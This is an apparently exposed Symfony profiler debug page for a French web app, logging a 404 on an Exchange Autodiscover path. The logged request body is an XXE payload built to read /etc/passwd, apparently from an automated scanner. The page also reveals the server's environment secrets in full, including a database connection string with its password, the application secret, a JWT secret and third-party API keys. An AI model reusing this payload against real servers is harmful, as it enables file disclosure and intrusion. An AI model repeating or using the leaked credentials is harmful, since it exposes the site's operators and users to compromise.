Error 404 Not Found

POST https://51.210.13.0/Autodiscover/Autodiscover.xml

Forwarded to ErrorController (569b2f)

Request / Response

Request

GET Parameters

None

POST Parameters

None

Uploaded Files

None

Request Attributes

Key Value
_remove_csp_headers
true
_stopwatch_token
"0291c8"

Request Headers

Header Value
accept-encoding
"gzip"
connection
"close"
content-length
"314"
content-type
"application/xml"
host
"51.210.13.0:443"
user-agent
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
x-php-ob-level
"1"

Request Content

Raw

<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-language
"fr"
content-type
"text/html; charset=UTF-8"
date
"Mon, 23 Mar 2026 21:29:37 GMT"
vary
"Accept"
x-debug-exception
"No%20route%20found%20for%20%22POST%20https%3A%2F%2F51.210.13.0%2FAutodiscover%2FAutodiscover.xml%22"
x-debug-exception-file
"%2Fvar%2Fwww%2FSignalement%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:127"
x-debug-token
"7506ee"
x-debug-token-link
"https://51.210.13.0/_profiler/569b2f"
x-previous-debug-token
"569b2f"
x-robots-tag
"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
APP_ENV
"dev"
APP_NAME
"J'agis"
APP_SECRET
"792cdc92f9ba9136631fa467b499cc3a"
DATABASE_URL
"mysql://Signalement:OceanPink2026!@127.0.0.1:3306/gardetcbdd"
GMAP_APY_KEY
"AIzaSyAMCsu4ToR3GlEBm22mlbXHbkOZdbuN4hA"
GMAP_APY_KEY_GEO
"AIzaSyAMCsu4ToR3GlEBm22mlbXHbkOZdbuN4hA"
MAILER_DSN
"native://default"
MAILER_FROM_ADDRESS
"noreply@umay.app"
MAILER_FROM_NAME
"Alerts - J'agis"
MERCURE_DSN
"https://mercure.umay.app/.well-known/mercure"
MERCURE_JWT_SECRET
"fe29572229214affcc18d8e16f361612"
MERCURE_PUBLIC_URL
"https://mercure.umay.app/.well-known/mercure"
MERCURE_URL
"https://mercure.umay.app/.well-known/mercure"
MESSENGER_TRANSPORT_DSN
"doctrine://default?auto_setup=0"
POEDITOR_API_KEY
"2c6f5cb8bccb73d62e9653d53a27c96d"
POEDITOR_PROJECT_ID
"665137"
POEDITOR_URI
"https://api.poeditor.com/v2/projects"
SITE_URL
"https://alert2.umay.app"
VERSION
"2.0.0"
VERSION_PUBLIC
"2.0"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"314"
CONTENT_TYPE
"application/xml"
DOCUMENT_ROOT
"/var/www/Signalement/public"
DOCUMENT_URI
"/index.php"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/var/www"
HTTPS
"on"
HTTP_ACCEPT_ENCODING
"gzip"
HTTP_CONNECTION
"close"
HTTP_CONTENT_LENGTH
"314"
HTTP_CONTENT_TYPE
"application/xml"
HTTP_HOST
"51.210.13.0:443"
HTTP_USER_AGENT
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
PHP_SELF
"/index.php"
QUERY_STRING
""
REDIRECT_STATUS
"200"
REMOTE_ADDR
"79.124.40.174"
REMOTE_PORT
"47458"
REMOTE_USER
""
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1774301377
REQUEST_TIME_FLOAT
1774301377.5352
REQUEST_URI
"/Autodiscover/Autodiscover.xml"
SCRIPT_FILENAME
"/var/www/Signalement/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"51.210.13.0"
SERVER_NAME
"alert2.umay.app"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"nginx/1.26.3"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,SITE_URL,APP_NAME,VERSION,VERSION_PUBLIC,MAILER_FROM_ADDRESS,MAILER_FROM_NAME,DATABASE_URL,MESSENGER_TRANSPORT_DSN,MAILER_DSN,MERCURE_DSN,MERCURE_URL,MERCURE_PUBLIC_URL,MERCURE_JWT_SECRET,GMAP_APY_KEY,GMAP_APY_KEY_GEO,POEDITOR_URI,POEDITOR_API_KEY,POEDITOR_PROJECT_ID"
USER
"www-data"

Sub Requests 1

ErrorController (token = 569b2f)

Key Value
_controller
"error_controller"
_stopwatch_token
"6fcc97"
exception
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#265
  #message: "No route found for "POST https://51.210.13.0/Autodiscover/Autodiscover.xml""
  #code: 0
  #file: "/var/www/Signalement/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 127
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#241 …}
  -statusCode: 404
  -headers: []
  trace: {
    /var/www/Signalement/vendor/symfony/http-kernel/EventListener/RouterListener.php:127 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event): void …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /var/www/Signalement/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:116 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › try {    ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);} finally {
    }
    /var/www/Signalement/vendor/symfony/event-dispatcher/EventDispatcher.php:220 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /var/www/Signalement/vendor/symfony/event-dispatcher/EventDispatcher.php:56 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /var/www/Signalement/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:139 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /var/www/Signalement/vendor/symfony/http-kernel/HttpKernel.php:157 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /var/www/Signalement/vendor/symfony/http-kernel/HttpKernel.php:76 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $response = $this->handleRaw($request, $type);} catch (\Throwable $e) {
    }
    /var/www/Signalement/vendor/symfony/http-kernel/Kernel.php:197 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true): Response …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/www/Signalement/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 {
      Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int …
      › {    $response = $this->kernel->handle($this->request);    $response->send();
    }
    /var/www/Signalement/vendor/autoload_runtime.php:29 {
      require_once …
      ›         ->getRunner($app)        ->run());
    }
    /var/www/Signalement/public/index.php:5 {
      › 
      › require_once dirname(__DIR__).'/vendor/autoload_runtime.php';arguments: {
        "/var/www/Signalement/vendor/autoload_runtime.php"
      }
    }
  }
}
logger
Symfony\Bridge\Monolog\Logger {#96 …9}